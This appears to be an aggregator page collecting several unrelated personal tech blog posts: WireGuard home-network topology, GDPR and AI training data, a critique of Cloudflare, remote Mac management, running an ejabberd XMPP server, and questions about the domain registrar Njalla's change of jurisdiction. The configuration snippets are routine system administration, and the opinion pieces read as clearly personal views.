Our topology within the home network is still point-to-point. As soon as I return home, my laptop will connect directly to the server when I toggle the away interface off and the home interface on. But now that we know about hub-and-spoke, it might make sense to consider using it at home as well. According to the connection matrix, the server can assume the role of a hub because all other devices already connect to it. Likewise, the server runs 24/7, so it will always be online to route packets. This topology simplifies the WireGuard configurations for all of the spokes. The desktop computer, phone, laptop, and tablet can now list the server as their only peer. This is convenient because now only one static address in the LAN network needs to be allocated by the DHCP server – the server’s. Consider the changes to the WireGuard configuration of the desktop computer. All peers are removed except the server, and the IPs of the phone and laptop are added to the server peer’s AllowedIPs. WireGuard will route packets for these other hosts through the server. We could also use Classless Inter-Domain Routing (CIDR) notation to state that packets for all hosts in the WireGuard network go through the server peer. The server, in turn, keeps listing every device at home as its peer but no longer needs an Endpoint for each. The peers will initiate the connection to the server. Once again, let’s test sending a packet from the desktop computer to the phone. The packet hops once through the server, is received by the phone, and is echoed back.

The downside to this topology is that the server is now a single point of failure. If the server dies then the spokes won’t be able to connect with each other through WireGuard. There’s also an added cost to having every packet flow through the hub. As for access control, much like we saw in the VPS, the hub now concentrates firewalling responsibilities. It knows which peer is looking to connect to which peer, thus it should establish rules for which packets can be forwarded. This is not mutually exclusive with input firewall rules on each device; those should exist as well.

We’ve seen that the home hub will route packets between the spokes. Furthermore, because it is a peer of the VPS, the server can be used to route connections coming from outside the LAN network. Effectively, these are two hubs that connect to each other so that packets can flow across separate physical networks. If the laptop wants to sync with the desktop while it is outside the LAN network, then the packets make two hops: once through the VPS, and another through the server. If the laptop is within the LAN network, the packets hop only once through the server. Yet, there’s a subtle caveat to this design. The laptop can initiate a sync with the desktop from outside the LAN network and receive the response that it expects.
However, the desktop can only initiate a sync with the laptop while the latter is within the LAN network. Why? Similar to our previous example of the laptop communicating with the server, the laptop is configured as a peer of the home hub. When the desktop initiates a sync, the server will attempt to route the packet to the laptop. Per our last change, the laptop doesn’t have a fixed Endpoint, and there is no established tunnel because the laptop is outside the network. Additionally, the home hub is not configured to route packets destined for the laptop through the VPS peer. The packet is thus dropped by the hub. One could look into making the routing dynamic such that the packets are delivered through other means, perhaps through mesh networking. But herein lies a compromise that I’ve made. In this design, a spoke in the home hub cannot initiate connections to a roaming client. It can only receive connections from them, because the roaming client uses NAT through the remote hub. I’m perfectly fine with this compromise as I don’t actually need this bidirectionality, and I don’t want the additional complexity from solving this issue. The remote hub facilitates tunneling into the home hub, not out of it. My needs call for allowing my mobile devices (e.g. laptop, phone, tablet) to communicate with the non-mobile devices at home (e.g. server, desktop), and this has been solved.

At this point we’re done insofar as the overarching topology of our WireGuard network goes, but there is an improvement that can be made to make our home hub less brittle. Consider the case where I’m using a router that can run WireGuard. Making the router the hub of our home network poses some benefits over the previous setup. First, the router is already a single point of failure by way of being responsible for the underlying LAN network. Making the router the hub isn’t as costly as it is with some other device in the network. Second, all devices in the network are already connected to the router. This simplifies the overall configuration because it is no longer necessary to configure static IP addresses in the DHCP server. Instead, each spoke can use the network gateway address to reach the hub. Let’s assume the LAN network’s gateway address and the router’s WireGuard IP address are fixed and known. Each spoke replaces the server peer with the router’s, and uses the gateway address for its Endpoint; the desktop computer’s version of this is sketched below. The server is demoted to a spoke and is configured like all other spokes. In turn, the router lists all peers like the server previously did. Again, the firewall in the router is now responsible for enforcing access control between spokes.

For the sake of illustrating how much further the underlying networks can evolve without interfering with the WireGuard network, consider the final design. I’ve broken apart the LAN network into separate VLANs to isolate network traffic. The server resides in its own VLAN, and client devices in another. The router keeps on forwarding packets in the WireGuard network regardless of where these devices are. The only change that is necessary to keep things working is to update the Endpoint address for the router peer in each spoke. The spoke now uses the corresponding VLAN gateway address, rather than that of the LAN network.

I’ve been using this setup for some months now and it’s been working without issues. A couple of thoughts come to mind having gone through this exercise and written about it. Running WireGuard on the router simplifies things considerably.
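To make the final router-as-hub design concrete, a spoke like the desktop ends up with a configuration along these lines. The VLAN gateway address (192.168.20.1) and the WireGuard subnet (10.10.0.0/24) are, again, placeholders of mine:

    # Desktop spoke in the router-as-hub design (placeholder values)
    [Interface]
    Address    = 10.10.0.2/24
    PrivateKey = <desktop-private-key>

    [Peer]
    # the router, acting as hub
    PublicKey           = <router-public-key>
    Endpoint            = 192.168.20.1:51820    # gateway address of the VLAN the desktop sits in
    AllowedIPs          = 10.10.0.0/24          # CIDR form: route the whole WireGuard subnet through the hub
    PersistentKeepalive = 25                    # optional: keeps the spoke reachable for traffic initiated elsewhere

The router's own configuration mirrors what the server had before: one [Peer] block per spoke, each with a /32 in AllowedIPs and no Endpoint.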
If the home network were not behind CGNAT then I could do away with the VPS hub altogether. I would still need separate WireGuard interfaces for when I’m on the go, but that’s not a big deal. Nonetheless, within the LAN network, configuration is simpler by using a hub-and-spoke topology with the router as hub. Centralizing access control on the router’s firewall is also appreciated.

WireGuard is simple to deploy and it just works. Nonetheless, some knowledge of networking is required to think through how to deploy WireGuard appropriately for a given context. Being comfortable with configuring interfaces and firewalls is also necessary to troubleshoot the inevitable connectivity issues. One can appreciate why solutions that abstract over WireGuard exist. I used Tailscale extensively before this and did not have to think through things as much as I did here. This was all solved for me. I just had to install the agent on each device, authorize it, and suddenly packets moved securely and efficiently across networks. And yet, WireGuard was there all along and I knew that I could unearth the abstraction. Now I appreciate its simplicity even more, and relish having a stronger understanding of what I previously took for granted.

Lastly, I purposefully omitted other aspects of my WireGuard setup for self-hosting, particularly around DNS. This will be the subject of another article, which is rather similar to the one I wrote on using Tailscale with custom domains. Furthermore, a closer look at access control in this topology might be of interest to others considering that there are multiple firewalls that come into play.

1. Each interface has its own configuration file, and can be thought of as a “connection profile” in the context of a VPN. This profile is managed by wg-quick on Linux, or through the WireGuard app for macOS, Android, etc.  ↩︎
2. In my case, that’s Debian and nftables. This article from Pro Custodibus explains how to configure packet forwarding for the hub.  ↩︎
References:
- WireGuard: Next Generation Kernel Network Tunnel
- Networking for System Administrators
- Primary WireGuard Topologies
- How Tailscale works

0 views
ava's blog 3 weeks ago

challenges around AI and the GDPR

Today, I once again met up with my mentor around data protection law and had some questions about his view on the compatibility of AI with several aspects of the General Data Protection Regulation (GDPR). The talk went really well and was super engaging, but I soon had to run home so I would not miss the GDPRhub meeting by noyb.eu! Quick plug: Consider donating to noyb.eu or even becoming a member if you care about defending data protection and privacy from Meta, Google et. al. :) I am volunteering as a Country Reporter for them! The meeting included a really great presentation on the exact topics I had discussed earlier, and motivated me to write a post about it, so here we are. The first issues start with the actual aggregation of data specific models are trained on. There are, of course, a lot of internal, small models being trained on a very limited dataset, for a highly specific purpose. It is usually in the best interest of their developers to keep it that way to not dilute the output and keep it small. What would scraping half the net do for a model that is supposed to help with a specific template document at work? But for the big ones (ChatGPT, Copilot, Grok and more) that are decidedly supposed to be allrounders who can be used for anything, there is a clear incentive to vacuum up anything they can. This directly contradicts the principle of data minimization . Article 5 lists several principles relating to the processing of personal data, and data minimization is the idea that processing should be adequate, relevant and limited to what is necessary in relation to the purposes. In practice, this means acquiring the least amount of personal data to get the job done. For example: In recent rulings, it was declared unlawful that train companies in the EU 1 demand your gender, email address and/or telephone number just to buy a train ticket, as these infos aren't needed for a customer to use a train, nor for the company to provide the service. It should be optional to share that, at least. This principle usually also incorporates aspects of another principle: The storage limitation . Personal data should only be stored as long as is necessary, but how do you decide how long a name, address, telephone number and similar information is necessary for the purposes in a huge dataset? Depending on the methods, it might even be impossible to remove. Furthermore, there's the principle of purpose limitation . Processing needs a stated purpose that needs to be specific, explicit and legitimate. With limited models, this may be easier, as the use for it is very targeted; but it is a point of contention in the legal discourse about whether something as very vague as "AI model training" or similar purposes related to that are specific enough, and if companies can reference an exemption for their models based on scientific research purposes. Also: It is likely that the data they are scraping has been put out there or been acquired for a different purpose. If I consent to having my picture taken and put on the company website to promote our product and drive customer engagement, I am not consenting to the fact that 5 years down the line, my image will be used for AI training, for example. A change of purpose requires information, maybe even renewed consent, but that is a mixed bag. It is relatively easy to inform and get consent of users if they have an account on your platform, as you can show them a note about it and let them make a decision - but what about data scraping outside of platforms? 
How can users outside of services like the ones Meta, Microsoft, X or Google own get a chance to consent or be informed about their personally identifiable data being used to train AI? The GDPR handles information requirements in two main ways: Article 13 is for companies (usually referred to as "controllers") obtaining data and consent directly from you, and Article 14 is for the case in which the controller obtains data of you indirectly (for example, by using someone else's datasets, or getting your data transmitted to them by the company who actually obtained it directly from you). So in the case of the broad scraping taking place, companies are still technically required to inform you based on Article 14. The problem is that obviously, it is not feasible in practice. If they scrape your name and have nothing else, how will they contact you? How are their employees supposed to search through terabytes of data to search for personally identifiable data? 2 How would they detect sensitive data that comes with extra requirements, like data related to health, sexual identity, ethnic origin, religion and more ( Article 9 ) or the data of children ( Article 8 ), and fulfill them? How are they supposed to contact millions of people, and track who has opted out and who has opted in, who hasn't replied, etc.? Article 14 acknowledges this issue in section 5 when it says that they don't have to inform you if it would not be feasible to do so or would require disproportional effort. This effectively means that most big companies training AI with extremely large datasets scraping the entire net are off the hook from telling data subjects (you, as the affected person) about it. Consent is similarly tricky. Article 7 of the GDPR sets conditions for consent, which say that the controller (company) needs to demonstrate that you gave consent 3 and that the way to consent should not be misleading, should be distinguishable from other matters, accessible, easy to understand, not coerced and is not binding if it fails these standards. You have the right to withdraw your consent at any time. Again, this might be fulfilled in your user account settings, but how will you think of withdrawing consent if you have never even been informed that you are affected, and never had a chance of consenting to begin with? By law, and by the way the tech works, you withdrawing consent is only for future processing and will not affect past processing, and not all processing needs to have its legal basis in consent. 4 Article 6 covers the legal basis for any processing of personal data in the EU or of EU citizens. In practice, that means that usually, one or more of Article 6 a) - f) will apply and is used as legal basis. Only one needs to be fulfilled though for it to be lawful, and consent is only one of them. a) handles you giving consent for one or more specific purposes (blanket consent doesn't count!). b) is for when the processing is necessary to fulfill a contract - think about you ordering from an online shop, and they need to give your address to the shipping company. c) covers legal obligations; for example, back when restaurants were required to ask for your name and contact info to comply with Covid-19 measures the government instated. d) is for the niche cases where processing your data is necessary to protect you or someone else. A case I could think of is maybe if security camera footage is used where you are seen, to help find a thief that stole from you or the neighbor. 
e) is a bit vague, covering what's "necessary for the performance of a task carried out in the public interest or in the exercise of official authority vested in the controller". f) is the catch-all, saying processing is necessary due to a legitimate interest by the company or third party, unless these are overridden by the interests and fundamental rights and freedoms of the data subject (you as the affected person), especially if it is a child. As covered above, consent can be acquired with a user account, but not otherwise, so for a chunk of data scraped from the web outside of social media platforms, that falls away. For example, if they scrape my blog, I did not give consent, and I also do not have a contract with them. They have no legal obligation to scrape it, the scraping doesn't protect me or someone else, it is likely not in the public interest and they aren't an official authority either. That leaves the catch-all: Legitimate interest . 'Legitimate interest' can only be claimed as a legal basis if the processing violates no part of the GDPR, so that it cannot be used as a loophole; but arguably, as seen above, there are at least a lot of open questions, if not downright violations of the law as it stands. Additionally, the sensitive data I already mentioned (from Article 9) cannot be processed under legitimate interest. That would be a chunk of data without a legal basis, then. It's also a delicate matter to discuss in general - if you believe AI will significantly advance humanity and is a superpower, you would surely argue that this is a legitimate interest to pursue and that the rights and freedoms of data subjects don't trump it. But how do you prove this speculation about the future? What if we focus solely on more realistic interests, like the economic incentive of companies (the legitimate interest in keeping up with competition or making a lot of money) or vaguer reasons like "providing a high quality tool serving our users and helping in research and development"? Would that be enough? How would the company argue that, for example, my blog data is necessary for this legitimate interest? Aside from that, there are several things that could impact the rights and freedoms of you, the data subject. There is the problem that the more data someone acquires, the more likely it is that your data is in it. It doesn't have to be personal data right away, but it is recognized in the discourse that when enough data is available, data points can link up and become personally identifiable data that is no longer anonymous or unrelated. As an easy-to-understand example: An address by itself is not personal data, as it cannot be linked to anyone, but if you slowly fill in occupation, hair color, car brand and online orders, it becomes more likely that you can deduce which of the residents it is. A username like " RickRoller2000 " with no other information attached is not by itself personally identifiable data, but if you suddenly also have the actual name of the person behind the account and link it to their username, the username becomes personally identifiable data. That poses the issue that data which previously did not fall under the GDPR can suddenly come to fall under it. This adds complexity to everything I have mentioned before, including your rights. Additionally, there are inherent risks and difficulties in enforcing your rights (specific to the product) that need to be taken into account when weighing legitimate interest against rights and freedoms.
Things like: Once in it, it might be difficult or impossible to remove (violating the data protection goal of intervenability, and the right of deletion in Article 17 ). At best, the output may be restricted as in Article 18 . Objection/withdrawal from consent only ex nunc , not ex tunc (= doesn't affect past processing). Possibility of harmful hallucinations that slander people - like when a journalist reports about murder, and the model generates that the journalist committed the murder. If it weren't trained on these articles, it wouldn't happen. There are less severe cases too, about the output mischaracterizing or misattributing someone's work or impact. As some of these models increasingly seek to replace a Google Search or Wikipedia, this should not be underestimated. At best, the output could be influenced by corrections done by the company 5 via Article 16 . Possible inability to fulfill your right of access to your data (obtaining a copy) or confirmation that your data is being used (based on Article 15 ). A big likelihood of being uninformed, not having consented, or not having had the proper chance to consent; either because you don't have a user account, or you don't check your account settings to notice this new setting suddenly popping up, and also because Meta and others have set very short deadlines to opt out . Many services have decided to implement it this way to get as much consent as possible, but this also violates the GDPR as consent needs to be freely and clearly given and opted into (in practice: via sliders or checkboxes that are not activated by default) and the principle of privacy-friendly defaults (also called: "Privacy by Design" and "Privacy by Default" ). You need to know what you consent to, and you can't do that if you never go into your settings to see an already-enabled setting. Doubts about the companies' ability to apply different protections and requirements to different types of data in a dataset, for example health data and data of children; difficulty of children to understand the consequences and properly consent. Arguably hard for non-experts in tech and AI (or: the average layperson) to understand how the data is processed and what the consequences are, not just due to the details of training and output generation, but also due to how new this sort of AI use and prevalence is, and how difficult it is to predict how it will be used in the future. How can you realistically give consent to something if you can't really judge its impact on you? The GDPR is from 2016, came into effect 2018 and was deliberately worded in a tech-neutral way to still welcome innovation and make it fit around a variety of products and services. However, it could have hardly predicted this. What's easy to enforce with phones, computers or social media is a lot harder with training large language models or image generators. That begs the question - should the GDPR be changed? I personally hate that approach, but it is being discussed. We had hopes for the AI Act , and we could have some positive effects from the Digital Markets Act . However, the AI Act has the most regulations and requirements for high risk AI, and basically none for low risk systems. It seems ChatGPT and Co. would very likely fall under low risk, meaning it doesn't even meaningfully regulate the most popular and powerfully huge models. 
On the other hand, there are Data Protection Authorities that have a very supportive "make it happen" approach to it all, which has led to the Superior Court of Cologne ruling very favorably on Meta AI opting everyone in by default and offering only a short time to opt out, saying Article 5 section 2 b) DMA (= that the company may not combine personal data from the relevant core platform service with personal data from any further core platform services or from any other services provided by them or with personal data from third-party services) is not applicable. They're also basing this on the fact that the data is public, that Meta has legitimate interests that override the rights of users, that the purpose is specified enough, that the data and its use are low risk, and that there are no less intrusive ways for Meta to do this. They consider 6 weeks a long enough time to opt out. That decision is definitely regarded as horseshit by everyone I talked to about this stuff, but it nonetheless happened (even if it will be challenged). It is unfortunately a reality that there is intense lobbying, a strongly political arms race and fear that Europe will fall further behind in tech innovation, and that definitely colors the approaches and decisions of regulatory bodies. The Hamburg DPA also apparently said that even if the data was unlawfully collected, it doesn't mean that the hosting and use of the model is unlawful, which further muddies the waters and is hard to justify. As it is now, something has to give, and it is a little scary to see which side will likely give in. Now excuse me while I collapse on the sofa; I wrote this for four hours straight right after work and the meeting, and I am so tired. Published 23 Sep, 2025 I know of specific cases in France and Germany (x) (x) ↩ And that is not all, as I will get to the issue of anonymous data turning into personally identifiable data later on. ↩ We're getting to some exemptions to that later. ↩ You also have a right to object based on Article 21, which means the company needs to stop processing that data unless they demonstrate compelling legitimate reasons for the processing which override the interests, rights and freedoms of you as the affected person. But realistically, how do they stop processing your data if it is in a large dataset that grows daily, is used for training again and again, and in some way arguably is part of what decides the quality of the output? ↩ No idea how specifically it is handled internally there, but I've seen successful corrections, or the model suddenly not giving an answer to a prompt that previously worked and showed lies. ↩

2 views
マリウス 3 weeks ago

Thoughts on Cloudflare

As many of you know, I am skeptical of the concept of relying on someone else’s computer , especially when a service grows to the point where it becomes an oligopoly, or worse, a monopoly. Cloudflare is, in my view, on track to becoming precisely that. As a result, I would argue they are a net negative for the internet and society at large. Besides the frustration they cause to VPN and Tor users through incessant captchas, Cloudflare’s infamous one more step pages have dulled users' vigilance, making them more vulnerable to even the most blatant malware attacks . Moreover, under the guise of iNnOvAtIvE cLoUd InFrAsTrUcTuRe , Cloudflare not only enable phishermen to phish and tunnelers to tunnel : Ironically, the very security measures they sell can be bypassed by bad actors using Cloudflare itself . It’s a similar irony that their systems, designed to shield clients from threats, sometimes struggle to defend their own infrastructure . Incidents like these highlight not only weaknesses in Cloudflare’s offerings but a broader issue: Cloudflare has become a highly attractive target for state-sponsored attacks , suffering from recurring breaches . Their sheer scale, considering that they are serving a substantial portion of the internet, means that an outage or compromise could have widespread, costly consequences. Another major concern is, that in many cases, Cloudflare acts as a man-in-the-middle SSL-terminating proxy between users and websites. They have visibility into everything users do on these sites, from browsing habits to submitting sensitive personal information. This makes Cloudflare a prime target for any actor seeking to harvest massive amounts of data. The Cloudbleed incident clearly demonstrated the risks: Tavis Ormandy posted the issue on his team’s issue tracker and said that he informed Cloudflare of the problem on February 17. In his own proof-of-concept attack he got a Cloudflare server to return “private messages from major dating sites, full messages from a well-known chat service, online password manager data, frames from adult video sites, hotel bookings. We’re talking full https requests, client IP addresses, full responses, cookies, passwords, keys, data, everything.” I stand with Hugo in considering Cloudflare harmful and recommend that websites avoid relying on it whenever possible. Cloudflare’s origins in Project Honeypot , and its early ties to the US Department of Homeland Security, are troubling to say the least: Five years later Mr Prince was doing a Master of Business Administration (MBA) at Harvard Business School, and the project was far from his mind, when he got an unexpected phone call from the US Department of Homeland Security asking him about the information he had gathered on attacks. Mr Prince recalls: “They said ‘do you have any idea how valuable the data you have is? Is there any way you would sell us that data?’. “I added up the cost of running it, multiplied it by ten, and said ‘how about $20,000 (£15,000)?’. “It felt like a lot of money. That cheque showed up so fast.” Mr Prince, who has a degree in computer science, adds: “I was telling the story to Michelle Zatlyn, one of my classmates, and she said, ‘if they’ll pay for it, other people will pay for it’.” Source: BBC Furthermore, Cloudflare has been criticized as an employer , reportedly fostering a hire-and-fire culture among its sales staff . 
Even its CEO has attracted controversy, such as suing neighbors over their dogs following objections to his plans to build an 11,300-square-foot estate, plans that required lobbying to overcome local zoning laws . Given all this, it is time to reconsider Cloudflare's dominant market position , controlling over 20% of the internet . Cloudflare has shown a pattern of equivocating on politically sensitive issues , perhaps to maintain its status as the world's largest botnet operator , and they appear to defend "free speech" when it is profitable , but not when it isn't . Cloudflare has also been accused of providing services to terrorists and drug traffickers while skirting international sanctions . Meanwhile, open-source developers have been harshly punished for less. Despite the brilliance of many engineers at Cloudflare, they are not infallible. They, too, experience recurring downtime and preventable mistakes . Cloudflare, like any other company, puts its pants on one leg at a time . There is no reason it should be treated as the default, or sole, solution for content delivery. If running your own Varnish instances isn't feasible, and you need a global CDN, consider alternatives that support competition and balance the scales. Info: Some hosting services might use Cloudflare without disclosing it openly/obviously, e.g. Render . Make sure to check whether the hosting service you're using employs Cloudflare's infrastructure in the background (a quick header check is sketched at the end of this post). If you currently have domains registered with Cloudflare, move them elsewhere immediately. As a general rule, never allow your CDN or hosting provider to also hold your domain registrations. Should the hosting provider cut you off, you'll want the freedom to quickly redirect your domains to another provider without disruption. For more info, visit the cloud and domains sections of the infrastructure page. If, however, you're running Cloudflare's more advanced service offerings, like Cloudflare Workers, you will likely have a harder time moving away. While some frameworks support different providers, like Vercel, Fastly, AWS, Azure, or Akamai, it is likely that most simple implementations will be heavily reliant on Cloudflare's architecture. There's unfortunately no easy path out of this, other than rewriting the specific components and infrastructure deployment configuration to support a different provider. If you wish to identify or avoid websites that make use of Cloudflare, you can use this browser extension for Firefox and Chrome (ironically created by Cloudflare). Beware that these extensions might transfer information about your browsing behavior to Cloudflare. Configure them to be active only when manually clicked on specific websites that you want to investigate. There are third-party alternatives like this and this , as well as older/unmaintained extensions like this and this . PS: Decentraleyes is a solid option to enhance browsing privacy; check the browser section for other helpful extensions. All that said, you might think "Come on, Cloudflare isn't that bad!" , and you'd be right: Every now and then, they do some good . *smirk* Still, we have to recognize that Cloudflare has grown into a cornerstone of modern digital infrastructure, a role that could eventually render it too big to fail , to borrow a term from the financial world. Footnote: The artwork was generated using AI and further botched by me using the greatest image manipulation program .
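As a quick aside on the detection tip above (my own sketch, not from the original post): Cloudflare-fronted sites usually give themselves away in their response headers, so a one-liner like the following, with example.com replaced by the site you want to investigate, is often enough to check:

  # look for Cloudflare markers such as "server: cloudflare" or a "cf-ray" header
  curl -sI https://example.com | grep -iE '^(server|cf-ray|cf-cache-status):'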

1 views
Jeff Geerling 3 weeks ago

You can finally manage Macs with FileVault remotely in Tahoe

It's nice to have a workstation set up that you can access anywhere via Screen Sharing to check on progress, jot down a note, etc.—and not be tied to a web app or some cloud service. I run a Wireguard VPN at home and at my studio, so I can remotely log into any of my infrastructure through the VPN—Macs included.
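The post doesn't include the VPN side of the setup, but for anyone who hasn't done this before, a minimal WireGuard client profile for reaching a home or studio network could look roughly like the sketch below. All keys, addresses and the endpoint are placeholders rather than values from the article; with such a tunnel up, Screen Sharing can simply target the Mac's internal address.

  [Interface]
  # private key of the device you are connecting from (placeholder)
  PrivateKey = <client-private-key>
  Address = 10.8.0.2/32

  [Peer]
  # public key and endpoint of the WireGuard server at home or in the studio (placeholders)
  PublicKey = <server-public-key>
  Endpoint = vpn.example.net:51820
  # route only the internal subnets through the tunnel
  AllowedIPs = 10.8.0.0/24, 192.168.1.0/24
  PersistentKeepalive = 25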

0 views
codedge 4 weeks ago

Modern messaging: Running your own XMPP server

For years we have known, or at least suspected, that our chats are listened in on, that our uploaded files are sold for advertising or whatever other purpose, and that the chance of our social messengers leaking our private data is incredibly high. It is about time to work against this. For three years now, the European Commission has been working on a plan to automatically monitor all chat, email and messenger conversations. 1 2 If this passes, and I strongly hope it will not, the European Union is moving in a direction we know from states that suppress freedom of speech. I went for setting up my own XMPP server, as it does not have any big resource requirements and still supports clustering (for high-availability purposes), encryption via OMEMO and file sharing, and is supported across platforms and operating systems. The ecosystem of clients has also evolved over the years to provide rock-solid software and solutions for multi-user chats and even audio and video calls. All steps and settings are bundled in a repository containing Ansible roles: https://codeberg.org/codedge/chat All code snippets below work on either Debian or Raspberry Pi OS.

The connection from your client to the XMPP server is encrypted, so we need certificates for our server. The first thing to do is to set up our domains and point them to the server's IP - both IPv4 and IPv6 are supported, and we can specify both later in our configuration. I assume the server is going to be run under your own domain and that all the following domains have been set up. Fill in the IPv6 addresses accordingly. ejabberd is robust server software that is included in most Linux distributions. Install from Process One repository: I discovered that ProcessOne, the company behind ejabberd , also provides a Debian repository . Install from GitHub: to get the most recent version, I use the packages offered in their code repository . To install version 25.07, just download the asset from the release. Make sure the following ports are opened in your firewall, taken from the ejabberd firewall settings . The MQTT port is also mentioned in the ejabberd docs, but we do not use it in this setup, so it stays closed. Depending on how you installed ejabberd, the config file lives in one of two default locations.

The configuration is a 70:30 balance between having a privacy-focused setup for your users and meeting most of the suggestions of the XMPP compliance test . That means settings that protect the privacy of the users are rated higher, even where they fail the test. The notable privacy and security settings are listed further below. The configuration file is in YAML format; keep an eye on indentation. Let's start digging into the configuration. Set the domain of your server. Set the database type: instead of using the default type, we opt for a different backend. Generate DH params: generate a fresh set of parameters for the DH key exchange in your terminal and link the new file in the ejabberd configuration. Ensure TLS for server-to-server (s2s) connections. The listeners inside the config are important, especially the ones for client, server-to-server and HTTP connections. For administration of ejabberd we need a user with admin rights and properly set up ACLs and access rules. There is a separate section for ACLs inside the config in which we set up an admin user name. The name of the user is important for later, when we actually create this user. The access rules should already be set up; just confirm that you have a correct entry for it.
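The actual commands and config snippets did not survive this feed, so here is a rough sketch of what the DH parameter generation and the corresponding ejabberd.yml entries might look like; the domain, paths and admin name are placeholders, and option names should be double-checked against the ejabberd documentation for your version.

  # generate fresh Diffie-Hellman parameters (path is a placeholder)
  openssl dhparam -out /etc/ejabberd/dhparams.pem 4096
  # then reference this file from the TLS-related options in ejabberd.yml

  # ejabberd.yml (illustrative excerpt)
  hosts:
    - example.org
  s2s_use_starttls: required
  acl:
    admin:
      user:
        - admin@example.org
  access_rules:
    configure:
      allow: admin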
Now the new user needs to be created by running this command on the console; watch out to put in the correct domain. Another user can be registered with the same command. We set the admin user name in the config previously; that is how ejabberd knows which user has admin permissions. File uploads are enabled via the HTTP upload module. First, create a folder where the uploads should be stored, then update the ejabberd configuration accordingly. The allowed file upload size is defined in a parameter and is set to 10 MB here. Make sure to delete uploaded files after a reasonable amount of time via a cronjob; an example is a cronjob that deletes files older than one week. In-band registration in ejabberd can be enabled with a few entries in the config file. If you want to enable registration for your server, make sure you enable a captcha for it, otherwise you will get a lot of spam and fake registrations. ejabberd provides a working captcha script that you can copy to your server and link in your configuration; its two dependencies need to be installed on your system. In the config file, ejabberd can provision TLS certificates on its own, so there is no need to install certbot . To avoid exposing ejabberd directly to the internet, a reverse proxy is put in front of the XMPP server. Instead of nginx , any other web server (Caddy, …) or proxy can be used as well. Here is a sample config for nginx . The nginx vhost offers the well-known files for indicating which other connection methods (BOSH, WS) your server provides; the details can be read in the XEP-0156 extension. In contrast to the examples in the XEP, our server offers no BOSH, only a websocket connection, so the BOSH part is removed from the config file. Put the host-meta.json file in a folder your nginx serves, and have a look at the path and URL where it is expected to be found. Clients I can recommend are Profanity , an easy-to-use command-line client, and Monal for macOS and iOS. A good overview of clients can be found on the official XMPP website .

Firewall ports (taken from the ejabberd firewall settings): 5222 : Jabber/XMPP client connections, plain or STARTTLS. 5223 : Jabber client connections, using the old SSL method. 5269 : Jabber/XMPP incoming server connections. 5280/5443 : HTTP/HTTPS for Web Admin and more. 7777 : SOCKS5 file transfer proxy. 3478/5349 : STUN+TURN/STUNS+TURNS service.

Notable privacy and security settings: XMPP over HTTP is disabled ( mod_bosh ). Discovering when a user last accessed the server is disabled ( mod_last ). Uploaded files are deleted on a regular basis (see upload config). Registering an account via a web page is disabled ( mod_register_web ). In-band registration can be enabled, default off, captcha-secured ( mod_register , see registration config).

Citizen-led initiative collecting information about Chat Control https://fightchatcontrol.eu   ↩︎ Explanation by Patrick Breyer, former member of the European Parliament https://www.patrick-breyer.de/en/posts/chat-control/   ↩︎
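The console command and the cleanup cronjob were likewise stripped from this feed; assuming the defaults described above, they might look roughly like this (domain, user name, password and upload path are placeholders):

  # create the admin user referenced in the acl section
  ejabberdctl register admin example.org 'a-strong-password'

  # crontab entry: purge uploads older than one week, every night at 03:00
  0 3 * * * find /var/lib/ejabberd/uploads -type f -mtime +7 -delete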

0 views
マリウス 1 months ago

Njalla Has Silently Changed: A Word of Caution

I’ve been using Njalla as my primary domain service for the past few years, and I’ve had nothing but good things to say about them. Their website is simple yet functional, their support is quick and efficient, and the company offers its services in a way that should be the global standard when it comes to data and privacy protection. Njalla made sense for me on many different levels: They’re a domain provider headquartered on a former pirate island nation in the Caribbean, which is home to countless offshore trust funds, that registers your domain in their name, so none of your personal information appears in the mandatory ICANN registration data. All of this is offered without any KYC requirements, and with the option to pay using Monero. And if that’s not enough, Njalla sends every email encrypted with your GPG public key and can even forego email entirely in favor of XMPP notifications with OMEMO encryption. Yes, Njalla also provides an API (with access tokens that can be configured with granular permissions) which works seamlessly with tools like Certbot , Lego , and others to request Let’s Encrypt certificates via DNS validation. Heck, there are even Terraform providers that support it. And if that still weren’t enough reasons to like Njalla , the Njalla blog offered unrivaled transparency and entertainment for everyone, giving people the chance to see with their own eyes how Njalla was fighting for the little guys . On top of that, I’ve always sympathized with brokep , Njalla ’s founder, and his work and many of his views. If you’re unfamiliar with him or his history, I recommend the (relatively new) series The Pirate Bay , which premiered on Sveriges Television at the end of 2024. Over the past few years, I’ve been quite vocal in my praise for Njalla . In fact, if you’re a regular reader of this site or have come across me on other platforms, you’ve probably seen me plug Njalla the same way Jensen Huang plugs AI . However, a recent interaction in the VT100 community channel prompted me to do what I periodically do with every service I use: Check what’s new. This time, it was Njalla ’s turn. While browsing through various pages on their website, I came across the About page and was surprised to find the following statement: Njalla is run by njalla.srl based in Costa Rica. Curious, I checked their terms of service and confirmed that Njalla does indeed appear to have relocated its operations from Nevis to Costa Rica. I searched through my email history to see if there had been any announcement about this change, but found nothing. Wanting to know when this happened, I checked Njalla ’s Mastodon and Bluesky profiles, but again found no mention of the move. I even went as far as looking at brokep ’s social profiles , only to find that they were either deleted or inactive. At that point, I started to get a bad feeling. Had Njalla been sold to someone else? Before jumping to conclusions, I decided to contact Njalla support to clarify the situation. Subject: 1337 Services LLC -> Njalla SRL? I just stumbled upon the fact that Njalla seemingly changed hands without any notice, and I would like to understand what happened to 1337 Services LLC on Nevis and who the new owner Njalla SRL is. I would appreciate further insights into this topic. Kind regards! The support replied promptly: Internal restructuring. Nothing to worry about. 
However, while it was a response , it wasn’t particularly satisfying, so I decided to be the PITA that I am somewhat known to be and ask again: Thank you for your reply and your re-assurance. I’d like to apoligize in advance for being a PITA, but with brokep seemingly having disabled his social media profiles (Bsky, Mastodon, X), discovering this change felt “off”. Also, as someone who has a relatively decent understanding of offshore jurisdictions and their governing laws, I am wondering about the motivation for this move. Costa Rica’s offshore landscape appears to have changed over the past years and their SRL/SA seemingly requires company books to reflect share ownership, which in turn list the owner’s name and ID numbers within the Central Bank of Costa Rica via the Registry of Transparency and Final Beneficiaries (RTBF). While UBO info is not publicly available unless explicitly listed as initial shareholders in the national registry, the information is still accessible and shareable by government entities and could make it easier for foreign entities to pressure the owners (and hence Njalla) into doing things it would otherwise not do. In addition, foreign court orders appear to be somewhat easier enforceable in Costa Rica’s jurisdiction, as opposed to Nevis, where foreign entities would in theory require dealing with local courts to obtain a local court order. While the trend towards transparency, information sharing and absurd KYC hasn’t passed Nevis/St. Kitts either (especially in terms of banking infrastructure) it appears that jurisdictions like Nevis or the Seychelles still seem to be “better” choices for operating a service like Njalla. I have been very vocal to recommend Njalla on different platforms, and I would like to update my recommendation based on this new reality. I would hence be curious to understand the rational behind the change, if you wouldn’t mind sharing a few insights. 